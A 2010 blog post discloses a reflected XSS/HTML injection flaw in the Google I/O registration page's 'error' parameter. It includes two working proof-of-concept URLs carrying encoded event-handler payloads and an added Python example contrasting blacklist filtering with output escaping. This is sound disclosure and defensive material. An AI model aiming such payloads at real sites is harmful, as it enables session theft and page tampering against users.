Wednesday, June 23, 2010

:::SPAS3C-WV-003:::Google IO XSS/HTML Injection Vulnerability

This post is about a bug discovered in Google IO (XSS/HTML Injection).

Risk: Medium

"Google I/O brings together thousands of developers for two days of deep technical content, focused on building the next generation of web, mobile, and enterprise applications with Google and open web technologies such as Android, Google Chrome, Google APIs, Google Web Toolkit, App Engine, and more."

Source: here

The GET parameter "error" was vulnerable to XSS/HTML code injection, but some tags and JavaScript events were filtered, which made exploitation more difficult.
I also noticed, when viewing the page source, that the error parameter triggered a SQL error, so I tried a SQL injection, but it did not work.

Proof of concept:

Indirect. Requires user interaction (JavaScript event: onmouseout) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ca%20href=%22http://www.malware.es%22%20onmouseout=%22alert%281%29%22%3EHOLA%20GOOGLE%3C/a%3E

Fig.1: XSS (Indirect) and HTML Injection.

Direct. No user interaction required (JavaScript event: onerror) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ch1%3E%3Cimg%20src=%22pepe.jpg%22%20onerror=%22alert%281%29%22%3EHI%20GOOGLE%20SECURITY%20TEAM%20I%27M%20%20ONLY%20TESTING%3C/a%3E%3C/h1%3E

Fig.2: XSS (Direct) and HTML Injection.
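As an added illustration (not code from the original post or from the site itself), the following contrasts the kind of tag/event blacklist the post describes with context-aware output encoding, using the decoded error values from the two proof-of-concept URLs above. The template, the blacklist and the helper names are assumptions, not the site's real code.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The two proof-of-concept URLs quoted in the post.
POC_INDIRECT = ("https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin"
                "&error=36%22%3E%3Ca%20href=%22http://www.malware.es%22%20onmouseout="
                "%22alert%281%29%22%3EHOLA%20GOOGLE%3C/a%3E")
POC_DIRECT = ("https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin"
              "&error=36%22%3E%3Ch1%3E%3Cimg%20src=%22pepe.jpg%22%20onerror=%22alert"
              "%281%29%22%3EHI%20GOOGLE%20SECURITY%20TEAM%20I%27M%20%20ONLY%20TESTING"
              "%3C/a%3E%3C/h1%3E")

# Constructed template standing in for a page that reflects ?error= into a
# quoted attribute value (the real page's markup is not reproduced here).
TEMPLATE = '<input type="hidden" name="error" value="{error}">'

# Hypothetical blacklist of the kind the post describes: a few tags and
# event handlers are stripped, but the list can never be complete.
BLOCKED = [r"<\s*script", r"onclick\s*=", r"onload\s*=", r"javascript:"]


def error_param(url: str) -> str:
    """Return the percent-decoded error= value from a PoC URL."""
    return parse_qs(urlsplit(url).query).get("error", [""])[0]


def render_blacklisted(error: str) -> str:
    """Vulnerable: strip known-bad patterns, then reflect the value raw.
    The leading 36" still closes the attribute and anything not on the
    list (onmouseout, onerror, <a>, <img>) reaches the browser intact."""
    for pat in BLOCKED:
        error = re.sub(pat, "", error, flags=re.IGNORECASE)
    return TEMPLATE.format(error=error)


def render_escaped(error: str) -> str:
    """Hardened: entity-encode for the quoted-attribute context. quote=True
    turns '"' into &quot;, so the value cannot break out of value="..."."""
    return TEMPLATE.format(error=html.escape(error, quote=True))


def attribute_breakout(rendered: str) -> bool:
    """Detection check for reviewers/tests: a new tag opening right after a
    closing quote means the reflected value escaped its attribute."""
    return re.search(r'">\s*<[a-z]', rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    for url in (POC_INDIRECT, POC_DIRECT):
        value = error_param(url)
        print("blacklist ->", attribute_breakout(render_blacklisted(value)))
        print("escaped   ->", attribute_breakout(render_escaped(value)))
```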

Be safe ;)

2 comments:

María José López said...

Great!! Thanks for getting everything to work a little better.

Be safe :)

José A. Vázquez said...

Thanks! I do what I can.